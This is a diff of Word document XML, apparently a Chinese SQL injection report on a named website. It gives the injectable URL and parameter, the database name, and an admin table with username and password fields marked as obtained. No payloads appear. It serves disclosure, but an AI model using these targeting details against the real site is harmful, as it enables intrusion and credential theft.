                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> HYPERLINK "http://www.dlhayashi.com" \t "_blank" </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="11"/>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>http://www.dlhayashi.com</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
+              <w:t>jm_admin</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -424,7 +1079,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -444,14 +1099,14 @@
                 <w:szCs w:val="24"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>影响范围</w:t>
+              <w:t>字段</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -470,156 +1125,7 @@
                 <w:szCs w:val="24"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>数据库信息泄露、管理员账号密码获取</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tblPrEx>
-          <w:tblBorders>
-            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          </w:tblBorders>
-          <w:shd w:val="clear"/>
-          <w:tblCellMar>
-            <w:top w:w="15" w:type="dxa"/>
-            <w:left w:w="15" w:type="dxa"/>
-            <w:bottom w:w="15" w:type="dxa"/>
-            <w:right w:w="15" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="10"/>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>漏洞状态</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>✅ 已确认</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tblPrEx>
-          <w:tblBorders>
-            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          </w:tblBorders>
-          <w:tblCellMar>
-            <w:top w:w="15" w:type="dxa"/>
-            <w:left w:w="15" w:type="dxa"/>
-            <w:bottom w:w="15" w:type="dxa"/>
-            <w:right w:w="15" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="10"/>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>测试时间</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>2026-03-09 ~ 2026-03-10</w:t>
+              <w:t>id, username, password, group</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -627,18 +1133,6 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="3"/>
-        <w:keepNext w:val="0"/>
-        <w:keepLines w:val="0"/>
-        <w:widowControl/>
-        <w:suppressLineNumbers w:val="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>2. 技术细节</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="4"/>
         <w:keepNext w:val="0"/>
         <w:keepLines w:val="0"/>
@@ -646,107 +1140,12 @@
         <w:suppressLineNumbers w:val="0"/>
       </w:pPr>
       <w:r>
-        <w:t>2.1 漏洞位置</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepNext w:val="0"/>
-        <w:keepLines w:val="0"/>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="10"/>
-        </w:rPr>
-        <w:t>URL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="12"/>
-        </w:rPr>
-        <w:t>http://www.dlhayashi.com/index.php?c=text&amp;a=gywm&amp;id=1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepNext w:val="0"/>
-        <w:keepLines w:val="0"/>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="10"/>
-        </w:rPr>
-        <w:t>注入点</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="12"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 参数</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepNext w:val="0"/>
-        <w:keepLines w:val="0"/>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="10"/>
-        </w:rPr>
-        <w:t>漏洞原因</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：应用程序未对用户输入进行参数化处理，直接将用户输入拼接到 SQL 语句中</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="4"/>
-        <w:keepNext w:val="0"/>
-        <w:keepLines w:val="0"/>
-        <w:widowControl/>
-        <w:suppressLineNumbers w:val="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>2.2 数据库信息</w:t>
+        <w:t>2.3 成功获取的数据</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="8"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblCellSpacing w:w="15" w:type="dxa"/>
         <w:tblInd w:w="0" w:type="dxa"/>
@@ -758,352 +1157,7 @@
           <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
         </w:tblBorders>
-        <w:shd w:val="clear"/>
-        <w:tblLayout w:type="autofit"/>
-        <w:tblCellMar>
-          <w:top w:w="15" w:type="dxa"/>
-          <w:left w:w="15" w:type="dxa"/>
-          <w:bottom w:w="15" w:type="dxa"/>
-          <w:right w:w="15" w:type="dxa"/>
-        </w:tblCellMar>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="1280"/>
-        <w:gridCol w:w="3555"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tblPrEx>
-          <w:tblBorders>
-            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          </w:tblBorders>
-          <w:shd w:val="clear"/>
-        </w:tblPrEx>
-        <w:trPr>
-          <w:tblHeader/>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>项目</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>内容</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tblPrEx>
-          <w:tblBorders>
-            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          </w:tblBorders>
-          <w:shd w:val="clear"/>
-          <w:tblCellMar>
-            <w:top w:w="15" w:type="dxa"/>
-            <w:left w:w="15" w:type="dxa"/>
-            <w:bottom w:w="15" w:type="dxa"/>
-            <w:right w:w="15" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="10"/>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>数据库名称</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>qdm177261645_db</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tblPrEx>
-          <w:tblBorders>
-            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          </w:tblBorders>
-          <w:shd w:val="clear"/>
-          <w:tblCellMar>
-            <w:top w:w="15" w:type="dxa"/>
-            <w:left w:w="15" w:type="dxa"/>
-            <w:bottom w:w="15" w:type="dxa"/>
-            <w:right w:w="15" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="10"/>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>表名</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>jm_admin</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tblPrEx>
-          <w:tblBorders>
-            <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          </w:tblBorders>
-          <w:shd w:val="clear"/>
-          <w:tblCellMar>
-            <w:top w:w="15" w:type="dxa"/>
-            <w:left w:w="15" w:type="dxa"/>
-            <w:bottom w:w="15" w:type="dxa"/>
-            <w:right w:w="15" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="10"/>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>字段</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>id, username, password, group</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="4"/>
-        <w:keepNext w:val="0"/>
-        <w:keepLines w:val="0"/>
-        <w:widowControl/>
-        <w:suppressLineNumbers w:val="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>2.3 成功获取的数据</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        <w:tblInd w:w="0" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-          <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
-        </w:tblBorders>
-        <w:shd w:val="clear"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
         <w:tblLayout w:type="autofit"/>
         <w:tblCellMar>
           <w:top w:w="15" w:type="dxa"/>
@@ -1126,7 +1180,7 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -1141,7 +1195,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -1173,7 +1227,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -1213,6 +1267,7 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -1226,7 +1281,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -1252,7 +1307,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2461,6 +2516,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="8"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblCellSpacing w:w="15" w:type="dxa"/>
         <w:tblInd w:w="0" w:type="dxa"/>
@@ -2472,7 +2528,7 @@
           <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
         </w:tblBorders>
-        <w:shd w:val="clear"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
         <w:tblLayout w:type="autofit"/>
         <w:tblCellMar>
           <w:top w:w="15" w:type="dxa"/>
@@ -2510,7 +2566,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2542,7 +2598,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2574,7 +2630,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2627,7 +2683,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2653,7 +2709,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2679,7 +2735,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2726,7 +2782,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2752,7 +2808,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2778,7 +2834,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2825,7 +2881,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
